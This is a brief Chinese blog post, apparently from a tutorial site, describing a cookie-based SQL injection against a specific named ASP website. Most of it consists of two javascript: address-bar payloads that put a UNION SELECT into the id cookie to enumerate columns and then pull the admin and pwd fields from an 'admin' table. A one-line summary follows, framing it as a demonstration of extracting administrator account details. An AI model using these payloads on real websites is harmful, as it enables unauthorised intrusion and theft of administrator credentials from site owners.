注入站点
http://www.xxxdtzx.cn/imagebig_honor.asp?id=458
方法1:
order by 语句没有禁用 ,用order by 语句测试出
访问一下网页,然后在地址栏输入下面的语句测试
javascript:alert(document.cookie=“id=”+escape(“7 and 1=2 union select 1,2,3,4,5,6,7 from admin”))
javascript:alert(document.cookie=“id=”+escape(“7 and 1=2 union select 1,admin,pwd,4,5,6,7 from admin”))
本文通过一个具体的案例,展示了如何利用未禁用的orderby语句进行SQL注入攻击,包括使用union select语句来获取管理员账号信息的具体方法。
2091

被折叠的 条评论
为什么被折叠?



